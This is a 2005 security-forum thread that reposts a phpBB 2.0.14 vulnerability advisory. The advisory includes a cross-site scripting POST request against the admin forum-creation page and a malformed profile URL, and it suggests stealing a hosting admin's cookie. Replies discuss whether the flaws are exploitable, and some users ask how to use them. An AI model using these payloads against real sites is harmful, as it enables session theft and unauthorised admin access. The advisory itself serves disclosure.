| 
  
        |  |  |  
      
        |  |  
  | 
  
    | 
	|  | Menu |  |  
     
     | 
      
       | 
        
         | 
          
           | 
						|  |  |  Home |  |  |  |  |  |  |  |  Discussions |  |  |  |  |  |  |  |  Tools |  |  |  |  |  |  |  |  Affiliates |  |  |  |  |  |  |  |  Content |  |  |  |  |  |  |  |  Info |  |  |  |  |  |  |  |  |  |  
  
    | 
	|  | User Info |  |  
     
     | 
      
       | 
        
         | 
          
           |  Membership: 
  Latest: MichaelSnaRe 
  New Today: 0 
  New Yesterday: 0 
  Overall: 9144 
 
  People Online: 
  Visitors: 74 
  Members: 0 
  Total: 74 
 |  |  |  |  |  
  
    | 
	|  | Full disclosure |  |  |  | 
  
    | 
	|  |  |  |  
        
          | 
              
                | 
                    
                      | 
                          
                            | 
	| 
	
		|  |  |  
		|  | IT Security and Insecurity Portal |  |  
 
	|  | -==phpBB 2.0.14 Multiple Vulnerabilities==- by HaCkZaTaN |  |  
	| 
	
		|  Posted: Sun Apr 24, 2005 2:10 am |   |  |  
	| 
	
		| 
		
			| 
			
				| 
				| LINUX |  | Moderator |  |  
  |  |  |  | Joined: May 24, 2004 |  | Posts: 404 |  | Location: Caiman |  |  
 
 |  |  
			|  |  |  
 
 | 
		
			|  	  | Code: |  	  | * --------------------------------------------------------
 [N]eo [S]ecurity [T]eam [NST]? - Advisory #14 - 17/04/05
 --------------------------------------------------------
 Program: phpBB 2.0.14
 Homepage: http://www.phpbb.com
 Vulnerable Versions: phpBB 2.0.14 & Lower versions
 Risk: Low Risk!!
 Impact: Multiple Vulnerabilities.
 
 -==phpBB 2.0.14 Multiple Vulnerabilities==-
 ---------------------------------------------------------
 
 - Description
 ---------------------------------------------------------
 phpBB is a high powered, fully scalable, and highly customizable
 Open Source bulletin board package. phpBB has a user-friendly
 interface, simple and straightforward administration panel, and
 helpful FAQ. Based on the powerful PHP server language and your
 choice of MySQL, MS-SQL, PostgreSQL or Access/ODBC database servers,
 phpBB is the ideal free community solution for all web sites.
 
 - Tested
 ---------------------------------------------------------
 localhost & many forums
 
 - Explotation
 ---------------------------------------------------------
 -==Bad Filter of HTML Code==-
 phpBB2/profile.php?mode=viewprofile&u=\[]phpBB2/viewtopic.php?p=3&highlight=\[]#########################################################
 -==XSS==-
 POST /admin/admin_forums.php?sid=7bd54a5a9861ef180af78897e70 HTTP/1.1
 forumname=<script>alert('NST')</script>&forumdesc=<script>alert('NST')</script>&c=1&forumstatus=0&prune_days=7&prune_freq=1&mode=createforum&f=&submit=Create
 new
 forum
 
 Some people cannot find it interest someones yes but well i dont care because if you
 put some effort you know that
 you can do a lot with this, like fooling the Admin of the Hosting to get his cookie
 & and then get access to whm...
 
 - References
 --------------------------------------------------------
 http://neosecurityteam.net/Advisories/Advisory-14.txt
 
 
 - Credits
 -------------------------------------------------
 Discovered by HaCkZaTaN <hck_zatan hotmail com>
 
 [N]eo [S]ecurity [T]eam [NST]? - http://neosecurityteam.net/
 
 Got Questions? http://neosecurityteam.net/
 
 Irc.gigachat.net #uruguay [NeoSecurity IRC]
 
 - Greets
 --------------------------------------------------------
 Paisterist
 Daemon21
 LINUX
 erg0t
 uyx
 CrashCool
 Makoki
 KingMetal
 r3v3ng4ns
 
 And my Colombian people
 
 @@@@'''@@@@'@@@@@@@@@'@@@@@@@@@@@
 '@@@@@''@@'@@@''''''''@@''@@@''@@
 '@@'@@@@@@''@@@@@@@@@'''''@@@
 '@@'''@@@@'''''''''@@@''''@@@
 @@@@''''@@'@@@@@@@@@@''''@@@@@
 */
 
 /* EOF */
 
 | 
 
 http://neosecurityteam.net/
  |  |  
		|  |  |  
	|  |  |  | 
 
	|  |  |  |  
	| 
	
		|  Posted: Wed Apr 27, 2005 7:06 pm |   |  |  
	| 
	
		| 
		
			| 
			
				| 
				| KingOfSka |  | Advanced user |  |  
  |  |  |  | Joined: Mar 13, 2005 |  | Posts: 61 |  |  |  |  
 
 |  |  
			|  |  |  
 
 | 
		
			| can't understand how to make it work lol i get a blank profile every time i try..
 |  |  
		|  |  |  
	|  |  
	| 
	
		|  Posted: Thu Apr 28, 2005 7:49 pm |   |  |  
	| 
	
		| 
		
			| 
			
				| 
				| gulftech |  | Valuable expert |  |  
  |  |  |  | Joined: Apr 20, 2005 |  | Posts: 9 |  |  |  |  
 
 |  |  
			|  |  |  
 
 | 
		
			| 1) Putting any non integer based value that doesn't return a record will result in the blank profile. 
 2) The regex issue in highlight is more of a bug than a security issue. I could be wrong, but I have glanced at the code an don't see it as exploitable. It is a bug though and should be fixed I guess.
 
 3) I have never heard of cross site scripting when using the post method, but I could see how POST cross site scripting could be exploited. For example, you could have an auto submitted form using javascript, but in this example a valid session id is required so it is not exploitable.
 |  |  
		|  |  |  
	|  |  
	| 
	
		|  Posted: Sat May 21, 2005 12:30 pm |   |  |  
	| 
	
		| 
		
			| 
			
				| 
				| Twinky |  | Regular user |  |  
  |  |  |  | Joined: May 20, 2005 |  | Posts: 5 |  |  |  |  
 
 |  |  
			|  |  |  
 
 | 
		
			| how do i use this  can sum1 plz explain |  |  
		| 
		
			| 
 Last edited by Twinky on Sat May 21, 2005 10:40 pm; edited 1 time in total
 |  |  |  
	|  |  
	| 
	
		|  Posted: Sat May 21, 2005 9:58 pm |   |  |  
	| 
	
		| 
		
			| 
			
				| 
				| g30rg3_x |  | Active user |  |  
  |  |  |  | Joined: Jan 23, 2005 |  | Posts: 31 |  | Location: OutSide Of The PE |  |  
 
 |  |  
			|  |  |  
 
 |  |  
		|  |  |  
	|  |  
	| www.waraxe.us Forum Index -> PhpBB 
 
	
		| You cannot post new topics in this forum You cannot reply to topics in this forum
 You cannot edit your posts in this forum
 You cannot delete your posts in this forum
 You cannot vote in polls in this forum
 
 | All times are GMT Page 1 of 1
 
 |  |  
	|  |  
 Powered by phpBB © 2001-2008 phpBB Group
 
 
 
 
 |  |  |  |  |  |  |